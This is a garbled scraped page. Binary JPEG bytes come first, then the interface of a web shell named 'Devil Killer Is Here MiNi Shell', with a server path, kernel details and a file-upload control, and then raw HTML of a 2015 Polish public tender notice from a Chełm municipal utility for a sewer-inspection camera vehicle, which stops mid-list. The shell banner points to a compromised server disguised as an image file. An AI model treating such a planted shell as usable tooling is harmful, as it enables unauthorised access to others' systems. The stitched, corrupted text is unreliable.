JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150805/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150805/198708-N-2015.html

<p class="kh_header"><b>Chełm: Dostawa samochodu diagnostycznego z zabudowaną kamerą TV do inspekcji kanałów sanitarnych</b><br>
<b>Numer ogłoszenia: 198708 - 2015; data zamieszczenia: 05.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. , ul. Wołyńska 57, 22-100 Chełm, woj. lubelskie, tel. 082 5631461 do 63, faks 082 5630450.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgk.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo komunalne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa samochodu diagnostycznego z zabudowaną kamerą TV do inspekcji kanałów sanitarnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa samochodu diagnostycznego z zabudowaną kamerą TV do inspekcji kanałów 
sanitarnych. 
2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1. 
2.1.  Wykonawca  na  potwierdzenie  zgodności  opisu  oferowanego  przedmiotu  zamówienia  składa  wypełniony 
prawidłowo załącznik nr 1. 
3.  Wykonawca  wraz  z  realizacją  dostawy  zobowiązany  będzie  do  przeprowadzenia  szkolenia  wyznaczonych 
pracowników zamawiającego w zakresie obsługi i eksploatacji sprzętu: 
-  w  ilości  nie mniejszej  niż  2  dni  robocze,  rozpoczęcie  nie  później  niż w  następnym  dniu  roboczym  po  odebraniu 
pojazdu; 
4.  Oferta  powinna  uwzględniać  wycenę  wszystkich  usług  towarzyszących,  związanych  pośrednio  z  przedmiotem 
zamówienia, np.: dostarczenie przedmiotu zamówienia do zamawiającego, baza sprzętowa, ul. Bieławin 5 w Chełmie 
(22-100); 
4.1. Dostawa samochodu, na który zostanie złożona oferta, odbędzie się w dni robocze w godzinach od 7:00 do 13:00. 
5. Minimalne warunki gwarancyjne określone są w załączniku nr 1 i w załączniku nr 5. 
5.1. W przypadku realizacji uprawnień gwarancyjnych przez podmiot  inny niż wykonawca wraz z ofertą należy złożyć 
pisemne  zobowiązanie  podpisane  przez  uprawnione  osoby  podmiotu  przejmującego  realizację  gwarancji  na 
warunkach określonych w niniejszym postępowaniu (np. umowa). 
6.  Zamawiający  nie  dopuszcza możliwości  składania  zgłoszeń,  usterek  bądź  przeglądów  do  różnych  podmiotów. Do 
przyjmowania zgłoszeń usterek i nadzorowania realizacji ich usunięcia zobowiązany jest wykonawca. 
6.1. Wykonawca  może  wyznaczyć  na  gwaranta  inny  podmiot,  tylko  w  przypadku  przedstawienia  zamawiającemu 
umowy, określającej szczegółowe warunki współpracy. Przedstawiona umowa nie może zawierać zapisów sprzecznych 
z zapisami załącznika nr 1 i 5..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 31.10.00.00-8, 34.14.40.00-8, 34.11.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych). 
2. Wadium wnosi  się  przed  upływem  terminu  składania  ofert. Wykonawca  powinien  dołączyć  do  oferty  dokument 
potwierdzający wniesienie wadium. 
1.3. Wadium może być wniesione w jednej lub kilku następujących formach: 
- pieniądzu; 
- poręczeniach bankowych  lub poręczeniach  spółdzielczej  kasy oszczędnościowo -  kredytowej,  z  tym  że poręczenie 
kasy jest zawsze poręczeniem pieniężnym; 
- gwarancjach bankowych; 
- gwarancjach ubezpieczeniowych; 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o 
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730  i 
732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). 
1.4. Wadium wnoszone w pieniądzu należy wpłacić wyłącznie przelewem na rachunek bankowy zamawiającego wraz z 
adnotacją:  /Dostawa  samochodu  diagnostycznego  z  zabudowaną  kamerą  TV  do  inspekcji  kanałów  sanitarnych/  w 
Banku Polska Kasa Opieki S. A. Grupa PeKaO I/Oddział Chełm nr 35 1240 2223 1111 0000 3576 9088 najpóźniej w dniu 
13.08.2015 r. 
Za  skuteczne wniesienie wadium w pieniądzu  zamawiający będzie uważał wadium,  które do dnia   13.08.2015  r. do 
godz. 11:00 znajdzie się na rachunku bankowym wskazanym przez zamawiającego. 
W przypadku wnoszenia wadium w innej postaci niż pieniężna, należy je wnieść do zamawiającego MPGK sp. z o. o. w 
Chełmie  najpóźniej  do  dnia  13.08.2015  r.  do  godz.  11:00.  Dokument  stanowiący  wadium  w  formie  niepieniężnej 
powinien zawierać zapis określony w art. 44 ust. 7 Regulaminu. 
1.5. Wykonawca, który nie wniesie wadium zostanie przez zamawiającego wykluczony z postępowania a  jego oferta 
zostanie uznana za odrzuconą. 
1.6. Zamawiający zwróci wadium: 
-  wszystkim  wykonawcom  niezwłocznie  po  wyborze  oferty  najkorzystniejszej  lub  unieważnieniu  postępowania,  z 
wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
- wykonawcy,  którego  oferta  została  wybrana  jako  najkorzystniejsza,  zamawiający zwraca wadium niezwłocznie po 
zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 
1.7. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy: 
- który wycofał ofertę przed upływem terminu składania ofert; 
1.8. Zamawiający  będzie żądał  ponownego wniesienia wadium przez wykonawcę, któremu zwrócono  wadium, jeżeli 
w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.  Wykonawca wnosi wadium w 
terminie określonym przez zamawiającego. 
1.9.  Jeżeli wadium wniesiono w pieniądzu zamawiający zwróci  je wraz z odsetkami wynikającymi z umowy  rachunku 
bankowego,  na  którym  było  ono  przechowywane  pomniejszone  o  koszty  prowadzenia  rachunku  bankowego  oraz 
prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
1.10. Zamawiający zatrzyma wadium wraz z odsetkami jeżeli wykonawca, którego oferta została wybrana: 
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. 
 
2.  Zamawiający  będzie  żądał  od wykonawcy,  którego  oferta  okaże  się  najkorzystniejsza, wniesienia  zabezpieczenia 
należytego wykonania umowy w wysokości 3 % ceny całkowitej brutto podanej w ofercie.  
2.1. Wykonawca jest zobowiązany wnieść zabezpieczenie przed dniem zawarcia umowy. 
2.2. Zabezpieczenie służy pokryciu roszczeń z tytułu nie wykonania lub nienależytego wykonania umowy. 
2.3. Zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: 
- pieniądzu; 
- poręczeniach bankowych  lub poręczeniach  spółdzielczej  kasy oszczędnościowo -  kredytowej,  z  tym  że poręczenie 
kasy jest zawsze poręczeniem pieniężnym; 
- gwarancjach bankowych; 
- gwarancjach ubezpieczeniowych; 
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o 
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami). 
2.4. Zamawiający nie wyraża zgody na wnoszenie zabezpieczeń: 
- w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej; 
-  poprzez  ustanowienie  zastawu  na  papierach  wartościowych  emitowanych  przez  Skarb  Państwa  lub  jednostkę 
samorządu terytorialnego; 
- przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o zastawie rejestrowym i rejestrze 
zestawów. 
2.5.  Zabezpieczenia wnoszone w pieniądzu wykonawca wpłaca przelewem na  rachunek bankowy  zamawiającego w 
Banku  Polska  Kasa Opieki  S.  A. Grupa  PeKaO  I/Oddział  Chełm  nr  35  1240  2223  1111  0000  3576  9088  z  adnotacją 
/Dostawa samochodu diagnostycznego z zabudowaną kamerą TV do inspekcji kanałów sanitarnych/. 
2.6.  Zabezpieczenie wniesione w  formie  niepieniężnej winno  zawierać  zobowiązanie  gwaranta  do  bezwarunkowej  i 
nieodwołalnej zapłaty zobowiązania stanowiącego zabezpieczenie należytego wykonania umowy na pierwsze żądanie 
zamawiającego zawierające oświadczenie, że wykonawca nie uregulował swoich zobowiązań wynikających z zawartej 
umowy. 
2.7. W trakcie realizacji umowy wykonawca, za zgodą zamawiającego, może dokonać zmiany formy zabezpieczenia na 
jedną lub kilka form, o których mowa w art. 64 ust. 1 Regulaminu. 
2.8. Zmiana  formy  zabezpieczenia  jest dokonywana  z  zachowaniem  ciągłości  zabezpieczenia  i bez  zmniejszenia  jego 
wysokości. 
2.9. Zamawiający zwróci zabezpieczenie w następujący sposób:  
-  70% wysokości  zabezpieczenia  zostanie  zwrócone w  terminie  30  dni  od  dnia wykonania  zamówienia  i  uznania  go 
przez zamawiającego za należycie wykonane. 
Należyte wykonanie zostanie stwierdzone bezusterkowym protokołem odbioru końcowego zamówienia. 
- 30% wysokości zabezpieczenia zostanie zwrócone nie później niż w 15 dniu po upływie okresu rękojmi za wady.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem (załącznik nr 3 lub 3a)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
b) Warunek  ten  zostanie  spełniony,  jeśli  wykonawca  wykaże,  że  w  ciągu  ostatnich  3  lat  przed  upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje, co najmniej 2  dostawy,  przedmiotów  zgodnych  z  opisem  i  odpowiadających  parametrom  przedmiotowi  zamówienia,  a wartość każdej z nich wyniosła co najmniej: 
- 325 000,00 zł (słownie zł: trzysta dwadzieścia pięć tysięcy); 
wraz z podaniem  ich wartości, przedmiotu, dat wykonania  i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem (załącznik nr 3 lub 3a)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem (załącznik nr 3 lub 3a)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z oświadczeniem (załącznik nr 3 lub 3a)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ DOKUMENTY NIEZBĘDNE DO POTWIERDZENIA SPEŁNIENIA TYCH 
WARUNKÓW. 
1. W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki, o których mowa w art. 11 Regulaminu. 
1.1. Posiadają uprawnienia do wykonywania określonej działalności  lub czynności,  jeżeli przepisy prawa nakładają 
obowiązek ich posiadania.  
Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
1.2. Posiadają wiedzę i doświadczenie do wykonania zamówienia.  
a) Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
b) Warunek  ten  zostanie  spełniony,  jeśli  wykonawca  wykaże,  że  w  ciągu  ostatnich  3  lat  przed  upływem  terminu 
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje, co najmniej 
2  dostawy,  przedmiotów  zgodnych  z  opisem  i  odpowiadających  parametrom  przedmiotowi  zamówienia,  a wartość 
każdej z nich wyniosła co najmniej: 
- 325 000,00 zł (słownie zł: trzysta dwadzieścia pięć tysięcy); 
wraz z podaniem  ich wartości, przedmiotu, dat wykonania  i podmiotów, na rzecz których dostawy zostały wykonane 
oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
1.3. Dysponują odpowiednim potencjałem technicznym. 
Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
1.4. Dysponują osobami zdolnymi do wykonania zamówienia.  
Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
1.5. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.  
Zgodnie z oświadczeniem (załącznik nr 3 lub 3a). 
2. W  postępowaniu mogą  wziąć  udział  wykonawcy,  którzy  nie  podlegają  wykluczeniu  na  podstawie  art.  24  ust  1 
Ustawy.  
Zgodnie z oświadczeniem (załącznik nr 4). 
 II  INFORMACJA  O  OŚWIADCZENIACH  LUB  DOKUMENTACH,  JAKIE  MAJĄ  DOSTARCZYĆ  WYKONAWCY  W  CELU 
POTWIERDZENIA  SPEŁNIENIA  WARUNKÓW  UDZIAŁU  W  POSTĘPOWANIU  (ART.  11  UST  1  PKT  1-4)  ORAZ 
NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 12 UST 1 REGULAMINU. 
1. W zakresie wykazania przez wykonawcę spełnienia warunków, o których mowa w art. 11 ust 1 pkt 1-4 Regulaminu 
wykonawca powinien złożyć: 
1.1. Oświadczenie zgodnie z treścią załącznika nr 3 lub 3a. 
1.2. Wykaz wykonanych lub wykonywanych dwóch dostaw, zgodnych z opisem i odpowiadających swoim charakterem 
przedmiotowi zamówienia, których wartość, każdej z nich, wyniosła co najmniej: 
- 325 000,00 zł (słownie zł: trzysta dwadzieścia pięć tysięcy); 
w  zakresie  niezbędnym  do  wykazania  spełniania warunku wiedzy  i  doświadczenia  w  okresie  ostatnich  3  lat  przed 
upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy  - w  tym  okresie,  z  podaniem 
wartości,  przedmiotu,  dat wykonania  i  odbiorców,  oraz  załączeniem  dokumentów  potwierdzających,  że  dostawy  te 
zostały wykonane należycie (załącznik nr 6). 
2. W zakresie potwierdzenia nie podlegania wykluczenia na podstawie art. 12 ust. 1 Regulaminu, należy przedłożyć: 
2.1. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 4). 
2.2.  Aktualny  odpis  z właściwego  rejestru  lub  z  centralnej  ewidencji  i  informacji  o  działalności  gospodarczej,  jeżeli 
odrębne  przepisy  wymagają  wpisu  do  rejestru  lub  ewidencji,  w  celu  wykazania  braku  podstaw  do  wykluczenia  w 
oparciu o art. 12 ust. 1 pkt 2 Regulaminu, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania 
ofert.  
3. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada: 
3.1. Dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że: 
3.1.1.  Nie  otwarto  jego  likwidacji  ani  nie  ogłoszono  upadłości  -  wystawiony  nie  wcześniej  niż  6  miesięcy  przed 
upływem  terminu  składania  wniosków  o  dopuszczenie  do  udziału  w  postępowaniu  o  udzielenie  zamówienia  albo 
składania ofert. 
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 
4.1. Dokumenty wymagane w przypadku składania oferty wspólnej: 
a) dokumenty i oświadczenia opisane w ust. VIII, od pkt 2.1. do pkt 2.2. oraz pkt. 3.1 składane są dla każdego partnera 
z osobna,  
b) pozostałe dokumenty składane są wspólnie.  
4.2. Wykonawcy wspólnie  ubiegający  się  o  udzielenie  niniejszego  zamówienia muszą wykazać,  iż  spełniają warunki 
udziału w postępowaniu w sposób określony w DIWZ. 
4.3.  Wykonawcy  ustanawiają  pełnomocnika  do  reprezentowania  ich  w  niniejszym  postępowaniu  albo 
reprezentowania  ich w postępowaniu  i zawarcia umowy w sprawie zamówienia. Zaleca  się, aby pełnomocnikiem był 
jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo musi być podpisane przez 
pozostałe podmioty występujące wspólnie (przez pozostałych członków konsorcjum). Strona 3 z 9 
4.4. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem. 
4.5. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, 
przed  zawarciem  umowy,  są  zobowiązani  do  zawiązania  konsorcjum.  Zaleca  się  zawiązanie  konsorcjum  na  drodze 
umowy cywilno-prawnej. W tym celu przed zawarciem umowy o niniejsze zamówienie są oni zobowiązani przedstawić 
zamawiającemu  umowę  regulującą  ich  współpracę  (umowę  konsorcjum)  zawierającą  w swojej  treści  następujące 
postanowienia: 
a) wskazanie lidera, będącego pełnomocnikiem pozostałych wykonawców tworzących konsorcjum, 
b)  prawa,  obowiązki  i  uprawnienia  lidera  (upoważnienie  lidera  do  zaciągania  zobowiązań  w  imieniu  wszystkich 
wykonawców  realizujących  wspólnie  umowę  i  każdego  z osobna,  a  także  upoważnienie  do  wystawiania  faktur, 
przyjmowania  płatności  od zamawiającego  oraz  do  przyjmowania  poleceń  na  rzecz  i  w  imieniu  wszystkich 
wykonawców realizujących wspólnie umowę), 
c)  oznaczenie  czasu  trwania  umowy  konsorcjum  -  minimum  na  okres  trwania  umowy  o wykonanie  niniejszego 
zamówienia publicznego i umowy gwarancji jakości, 
d)  określenie  sposobu współdziałania wykonawców  po  zawarciu  umowy w  sprawie  zamówienia  oraz  zakresu  prac 
przewidzianych do wykonania przez każdego z nich. 
5. Niespełnienie wymagań określonych w pkt 4.5. potraktowane będzie, jako uchylanie się od zawarcia umowy. 
6. Wykonawcy wspólnie ubiegający  się o udzielenie  zamówienia ponoszą  solidarną odpowiedzialność  za wykonanie 
umowy. 
Wymagane  dokumenty  muszą  mieć  formę  oryginałów  lub  kopii  (kserokopii)  poświadczonej  za  zgodność                      
z  oryginałem  przez  uprawnionego  przedstawiciela wykonawcy.  Ocena  spełnienia  przez wykonawców warunków 
będzie dokonana według formuły: spełnia - nie spełnia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
